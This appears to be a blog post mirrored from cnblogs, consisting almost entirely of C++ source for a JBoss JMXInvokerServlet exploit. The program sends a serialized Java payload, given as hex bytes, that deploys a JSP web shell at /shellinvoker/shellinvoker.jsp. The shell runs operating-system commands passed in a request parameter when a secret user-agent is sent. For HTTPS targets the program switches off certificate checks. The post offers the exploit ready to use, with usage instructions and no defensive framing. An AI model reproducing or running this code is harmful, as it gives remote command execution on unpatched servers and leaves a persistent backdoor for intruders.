zoukankan      html  css  js  c++  java

  • Jboss remote getshell (JMXInvokerServlet) vc版

    #include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <winhttp.h>
#include <comdef.h>
#pragma comment (lib,"Winhttp.lib")

char shell_invoke[] = ( 
    "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73" ///shellinvoker/shellinvoker.jsp
    "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72"
    "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f"
    "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77"
    "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76"
    "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2"
    "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75"
    "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e"
    "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00"
    "x78x70xe3x2cx60xe6x73x72x00x24x6fx72x67x2ex6ax62"
    "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d"
    "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc"
    "xe0xd1xf4x4axd0x99x0cx00x00x78x70x7ax00x00x02xc6"
    "x00x00x02xbexacxedx00x05x75x72x00x13x5bx4cx6ax61"
    "x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90"
    "xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x04"
    "x73x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65"
    "x6dx65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0f"
    "x03xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x2cx6a"
    "x62x6fx73x73x2ex61x64x6dx69x6ex3ax73x65x72x76x69"
    "x63x65x3dx44x65x70x6cx6fx79x6dx65x6ex74x46x69x6c"
    "x65x52x65x70x6fx73x69x74x6fx72x79x78x74x00x05x73"
    "x74x6fx72x65x75x71x00x7ex00x00x00x00x00x05x74x00"
    "x10x73x68x65x6cx6cx69x6ex76x6fx6bx65x72x2ex77x61"
    "x72x74x00x0cx73x68x65x6cx6cx69x6ex76x6fx6bx65x72"
    "x74x00x04x2ex6ax73x70x74x01x79x3cx25x40x20x70x61"
    "x67x65x20x69x6dx70x6fx72x74x3dx22x6ax61x76x61x2e"
    "x75x74x69x6cx2ex2ax2cx6ax61x76x61x2ex69x6fx2ex2a"
    "x22x25x3ex3cx70x72x65x3ex3cx25x69x66x28x72x65x71"
    "x75x65x73x74x2ex67x65x74x50x61x72x61x6dx65x74x65"
    "x72x28x22x70x70x70x22x29x20x21x3dx20x6ex75x6cx6c"
    "x20x26x26x20x72x65x71x75x65x73x74x2ex67x65x74x48"
    "x65x61x64x65x72x28x22x75x73x65x72x2dx61x67x65x6e"
    "x74x22x29x2ex65x71x75x61x6cx73x28x22x6ax65x78x62"
    "x6fx73x73x22x29x20x29x20x7bx20x50x72x6fx63x65x73"
    "x73x20x70x20x3dx20x52x75x6ex74x69x6dx65x2ex67x65"
    "x74x52x75x6ex74x69x6dx65x28x29x2ex65x78x65x63x28"
    "x72x65x71x75x65x73x74x2ex67x65x74x50x61x72x61x6d"
    "x65x74x65x72x28x22x70x70x70x22x29x29x3bx20x44x61"
    "x74x61x49x6ex70x75x74x53x74x72x65x61x6dx20x64x69"
    "x73x20x3dx20x6ex65x77x20x44x61x74x61x49x6ex70x75"
    "x74x53x74x72x65x61x6dx28x70x2ex67x65x74x49x6ex70"
    "x75x74x53x74x72x65x61x6dx28x29x29x3bx20x53x74x72"
    "x69x6ex67x20x64x69x73x72x20x3dx20x64x69x73x2ex72"
    "x65x61x64x4cx69x6ex65x28x29x3bx20x77x68x69x6cx65"
    "x20x28x20x64x69x73x72x20x21x3dx20x6ex75x6cx6cx20"
    "x29x20x7bx20x6fx75x74x2ex70x72x69x6ex74x6cx6ex28"
    "x64x69x73x72x29x3bx20x64x69x73x72x20x3dx20x64x69"
    "x73x2ex72x65x61x64x4cx69x6ex65x28x29x3bx20x7dx20"
    "x7dx25x3ex73x72x00x11x6ax61x76x61x2ex6cx61x6ex67"
    "x2ex42x6fx6fx6cx65x61x6excdx20x72x80xd5x9cxfaxee"
    "x02x00x01x5ax00x05x76x61x6cx75x65x78x70x01x75x72"
    "x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74"
    "x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00"
    "x78x70x00x00x00x05x74x00x10x6ax61x76x61x2ex6cx61"
    "x6ex67x2ex53x74x72x69x6ex67x71x00x7ex00x0fx71x00"
    "x7ex00x0fx71x00x7ex00x0fx74x00x07x62x6fx6fx6cx65"
    "x61x6ex63x79xb8x87x78x77x08x00x00x00x00x00x00x00"
    "x01x73x72x00x22x6fx72x67x2ex6ax62x6fx73x73x2ex69"
    "x6ex76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61"
    "x74x69x6fx6ex4bx65x79xb8xfbx72x84xd7x93x85xf9x02"
    "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00"
    "x00x04x70x78");

void request_https(wchar_t* Host,int port)
{
    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    LPSTR pszOutBuffer;
    BOOL bResults = FALSE;
    HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen( L"WinHTTP Example/1.0",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, 0);

    // Specify an HTTP server.
    if (hSession)
        hConnect = WinHttpConnect( hSession,Host,
        port, 0);

    // Create an HTTP request handle.
    if (hConnect)
        hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
        NULL, WINHTTP_NO_REFERER,
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        WINHTTP_FLAG_SECURE);

    DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
        SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
        SECURITY_FLAG_IGNORE_UNKNOWN_CA ;

    if( hRequest )
        bResults = WinHttpAddRequestHeaders( hRequest,
        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpAddRequestHeaders( hRequest, 
        L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
        (LPVOID)&options, sizeof (DWORD) );

    if(bResults == FALSE){
        printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld
",GetLastError());
    }

    // Send a request.
    if (hRequest){
        bResults = WinHttpSendRequest( hRequest,
            WINHTTP_NO_ADDITIONAL_HEADERS, 0,
            shell_invoke, WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke), 0);
        if(bResults == FALSE)
            printf ("WinHttpSendRequest error: %ld
",GetLastError());
    }

    if( hRequest ) WinHttpCloseHandle( hRequest );
    if( hConnect ) WinHttpCloseHandle( hConnect );
    if( hSession ) WinHttpCloseHandle( hSession );
}


void request_http(wchar_t* Host, int Port)
{
    DWORD dwSize = sizeof(DWORD);
    DWORD dwStatusCode = 0;
    BOOL  bResults = FALSE;
    HINTERNET hSession = NULL,
    hConnect = NULL,
    hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36", 
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME, 
        WINHTTP_NO_PROXY_BYPASS,
        0 );

    // Specify an HTTP server.
    if( hSession )
        hConnect = WinHttpConnect( hSession,
        Host,
        Port,
        0 );

    // Create an HTTP Request handle.
    if( hConnect )
        hRequest = WinHttpOpenRequest( hConnect,
        L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
        NULL,
        WINHTTP_NO_REFERER, 
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        0 );
    // Add a request header.
    if( hRequest )
        bResults = WinHttpAddRequestHeaders( hRequest,
        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

        bResults = WinHttpAddRequestHeaders( hRequest, 
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    // Send a Request.
    if( bResults ) 
        bResults = WinHttpSendRequest( hRequest, 
        WINHTTP_NO_ADDITIONAL_HEADERS,
        0,
        shell_invoke,WORD(sizeof(shell_invoke)),
        sizeof(shell_invoke),
        0 );

    // Report any errors.
    if( !bResults )
        printf( "Error %d has occurred.
", GetLastError( ) );

    // Close open handles.
    if( hRequest ) WinHttpCloseHandle( hRequest );
    if( hConnect ) WinHttpCloseHandle( hConnect );
    if( hSession ) WinHttpCloseHandle( hSession );
    //return 0;
}

int main(int argc, char* argv[])
{

    if (argc < 4)
    {
        printf("[*]:%s Jboss Exploit remote getshell
",argv[0]);
        printf("[*]:%s Remote_Host Remote_ip http/https 
",argv[0]);
        printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp
");
        return -1;
    }
    wchar_t Host[MAX_PATH] = {0};
    wchar_t procotol[MAX_PATH] = {0};
    wsprintfW(Host, L"%S", argv[1]);
    wsprintfW(procotol,L"%S",argv[3]);
    printf("
[*]:Host:%S procotol:%S 
", Host,procotol);

    if (0 == lstrcmpi(procotol, L"http"))
    {
        request_http(Host,atoi(argv[2]));

    }else if(0 == lstrcmpi(procotol, L"https"))
    {
        request_https(Host,atoi(argv[2]));
    }else
    {
        printf("
Unknown option.
");
        return 0;
    }
    return 0;
}
  • 相关阅读:
    ifup和ifdown
    shell 字符串操作 + 变量替换
    idea普通项目转maven项目
    重磅发布 | 阿里云视图计算,边缘计算的主“战”场
    视图计算背后的技术架构思考
    连续三年入围 Gartner 容器竞争格局,阿里云容器服务新布局首次公开
    6 张图带你彻底搞懂分布式事务 XA 模式
    Flink 在唯品会的实践
    贝壳基于 Flink 的实时计算演进之路
    关于写文章的一点经验
  • 原文地址:https://www.cnblogs.com/killbit/p/4489664.html
Copyright © 2011-2022 走看看